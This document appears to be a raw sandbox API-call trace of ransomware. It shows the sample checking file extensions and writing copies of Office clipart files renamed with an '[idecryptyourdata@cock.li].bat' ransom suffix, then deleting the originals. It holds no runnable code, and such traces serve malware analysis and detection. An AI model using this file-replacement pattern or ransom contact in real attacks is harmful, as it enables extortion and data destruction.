[0069.227] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.227] lstrlenW (lpString=".xlsx") returned 5 [0069.227] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0069.227] lstrlenW (lpString=".ppt") returned 4 [0069.227] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 68 [0069.227] lstrlenW (lpString=".zip") returned 4 [0069.227] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.227] lstrlenW (lpString=".rar") returned 4 [0069.227] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.227] lstrlenW (lpString=".bz2") returned 4 [0069.227] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.227] lstrlenW (lpString=".7z") returned 3 [0069.227] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 68 [0069.227] lstrlenW (lpString=".dbf") returned 4 [0069.227] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 68 [0069.227] lstrlenW (lpString=".1cd") returned 4 [0069.227] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 68 [0069.227] lstrlenW (lpString=".jpg") returned 4 [0069.227] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.227] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.228] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.228] GetLastError () returned 0x0 [0069.228] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x11dfe, lpOverlapped=0x0) returned 1 [0069.242] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x11e00, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x11e00, lpOverlapped=0x0) returned 1 [0069.244] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.244] WriteFile (in: hFile=0x38c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.244] SetEndOfFile (hFile=0x38c) returned 1 [0069.246] CloseHandle (hObject=0x38c) returned 1 [0069.246] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.246] SetEndOfFile (hFile=0x380) returned 1 [0069.249] CloseHandle (hObject=0x380) returned 1 [0069.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.250] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf")) returned 1 [0069.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 68 [0069.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 68 [0069.250] lstrlenW (lpString=".doc") returned 4 [0069.250] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.250] lstrlenW (lpString=".docx") returned 5 [0069.250] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0069.250] lstrlenW (lpString=".pdf") returned 4 [0069.250] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.250] lstrlenW (lpString=".xls") returned 4 [0069.250] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.251] lstrlenW (lpString=".xlsx") returned 5 [0069.251] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0069.251] lstrlenW (lpString=".ppt") returned 4 [0069.251] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 68 [0069.251] lstrlenW (lpString=".zip") returned 4 [0069.251] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.251] lstrlenW (lpString=".rar") returned 4 [0069.251] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.251] lstrlenW (lpString=".bz2") returned 4 [0069.251] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.251] lstrlenW (lpString=".7z") returned 3 [0069.251] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 68 [0069.251] lstrlenW (lpString=".dbf") returned 4 [0069.251] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 68 [0069.251] lstrlenW (lpString=".1cd") returned 4 [0069.251] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 68 [0069.251] lstrlenW (lpString=".jpg") returned 4 [0069.251] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.251] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.251] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.252] GetLastError () returned 0x0 [0069.252] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2dae, lpOverlapped=0x0) returned 1 [0069.690] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2db0, lpOverlapped=0x0) returned 1 [0069.691] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.691] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.691] SetEndOfFile (hFile=0x368) returned 1 [0069.691] CloseHandle (hObject=0x368) returned 1 [0069.691] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.691] SetEndOfFile (hFile=0x380) returned 1 [0069.692] CloseHandle (hObject=0x380) returned 1 [0069.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.692] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg")) returned 1 [0069.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 68 [0069.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 68 [0069.693] lstrlenW (lpString=".doc") returned 4 [0069.693] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.693] lstrlenW (lpString=".docx") returned 5 [0069.693] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0069.693] lstrlenW (lpString=".pdf") returned 4 [0069.693] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.693] lstrlenW (lpString=".xls") returned 4 [0069.693] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.693] lstrlenW (lpString=".xlsx") returned 5 [0069.693] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0069.693] lstrlenW (lpString=".ppt") returned 4 [0069.693] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 68 [0069.693] lstrlenW (lpString=".zip") returned 4 [0069.693] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.693] lstrlenW (lpString=".rar") returned 4 [0069.693] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.693] lstrlenW (lpString=".bz2") returned 4 [0069.693] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.693] lstrlenW (lpString=".7z") returned 3 [0069.693] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 68 [0069.693] lstrlenW (lpString=".dbf") returned 4 [0069.693] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 68 [0069.693] lstrlenW (lpString=".1cd") returned 4 [0069.693] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 68 [0069.694] lstrlenW (lpString=".jpg") returned 4 [0069.694] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.694] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.694] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.694] GetLastError () returned 0x0 [0069.694] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x55ba, lpOverlapped=0x0) returned 1 [0069.696] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x55c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x55c0, lpOverlapped=0x0) returned 1 [0069.697] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.697] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.697] SetEndOfFile (hFile=0x368) returned 1 [0069.697] CloseHandle (hObject=0x368) returned 1 [0069.697] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.698] SetEndOfFile (hFile=0x380) returned 1 [0069.698] CloseHandle (hObject=0x380) returned 1 [0069.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.699] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf")) returned 1 [0069.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 68 [0069.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 68 [0069.699] lstrlenW (lpString=".doc") returned 4 [0069.699] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.699] lstrlenW (lpString=".docx") returned 5 [0069.699] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0069.699] lstrlenW (lpString=".pdf") returned 4 [0069.699] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.699] lstrlenW (lpString=".xls") returned 4 [0069.699] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.699] lstrlenW (lpString=".xlsx") returned 5 [0069.699] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0069.699] lstrlenW (lpString=".ppt") returned 4 [0069.699] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 68 [0069.699] lstrlenW (lpString=".zip") returned 4 [0069.699] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.699] lstrlenW (lpString=".rar") returned 4 [0069.699] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.699] lstrlenW (lpString=".bz2") returned 4 [0069.700] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.700] lstrlenW (lpString=".7z") returned 3 [0069.700] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 68 [0069.700] lstrlenW (lpString=".dbf") returned 4 [0069.700] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 68 [0069.700] lstrlenW (lpString=".1cd") returned 4 [0069.700] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 68 [0069.700] lstrlenW (lpString=".jpg") returned 4 [0069.700] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.701] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.701] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.701] GetLastError () returned 0x0 [0069.701] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xc53a, lpOverlapped=0x0) returned 1 [0069.710] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xc540, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xc540, lpOverlapped=0x0) returned 1 [0069.713] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.713] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.713] SetEndOfFile (hFile=0x368) returned 1 [0069.713] CloseHandle (hObject=0x368) returned 1 [0069.713] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.713] SetEndOfFile (hFile=0x380) returned 1 [0069.714] CloseHandle (hObject=0x380) returned 1 [0069.714] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.714] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg")) returned 1 [0069.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 68 [0069.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 68 [0069.715] lstrlenW (lpString=".doc") returned 4 [0069.715] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.715] lstrlenW (lpString=".docx") returned 5 [0069.715] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0069.715] lstrlenW (lpString=".pdf") returned 4 [0069.715] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.715] lstrlenW (lpString=".xls") returned 4 [0069.715] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.715] lstrlenW (lpString=".xlsx") returned 5 [0069.715] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0069.715] lstrlenW (lpString=".ppt") returned 4 [0069.715] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 68 [0069.715] lstrlenW (lpString=".zip") returned 4 [0069.715] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.715] lstrlenW (lpString=".rar") returned 4 [0069.715] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.715] lstrlenW (lpString=".bz2") returned 4 [0069.715] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.715] lstrlenW (lpString=".7z") returned 3 [0069.715] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 68 [0069.715] lstrlenW (lpString=".dbf") returned 4 [0069.715] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 68 [0069.715] lstrlenW (lpString=".1cd") returned 4 [0069.715] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 68 [0069.716] lstrlenW (lpString=".jpg") returned 4 [0069.716] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.716] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.717] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.717] GetLastError () returned 0x0 [0069.717] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xabad, lpOverlapped=0x0) returned 1 [0069.729] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xabb0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xabb0, lpOverlapped=0x0) returned 1 [0069.738] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.738] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.738] SetEndOfFile (hFile=0x368) returned 1 [0069.751] CloseHandle (hObject=0x368) returned 1 [0069.751] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.751] SetEndOfFile (hFile=0x380) returned 1 [0069.752] CloseHandle (hObject=0x380) returned 1 [0069.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg")) returned 1 [0069.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 68 [0069.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 68 [0069.753] lstrlenW (lpString=".doc") returned 4 [0069.753] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.753] lstrlenW (lpString=".docx") returned 5 [0069.753] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0069.753] lstrlenW (lpString=".pdf") returned 4 [0069.753] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.753] lstrlenW (lpString=".xls") returned 4 [0069.753] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.753] lstrlenW (lpString=".xlsx") returned 5 [0069.753] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0069.753] lstrlenW (lpString=".ppt") returned 4 [0069.753] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 68 [0069.753] lstrlenW (lpString=".zip") returned 4 [0069.753] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.753] lstrlenW (lpString=".rar") returned 4 [0069.753] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.753] lstrlenW (lpString=".bz2") returned 4 [0069.753] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.754] lstrlenW (lpString=".7z") returned 3 [0069.754] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 68 [0069.754] lstrlenW (lpString=".dbf") returned 4 [0069.754] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 68 [0069.754] lstrlenW (lpString=".1cd") returned 4 [0069.754] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 68 [0069.754] lstrlenW (lpString=".jpg") returned 4 [0069.754] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.754] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.754] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 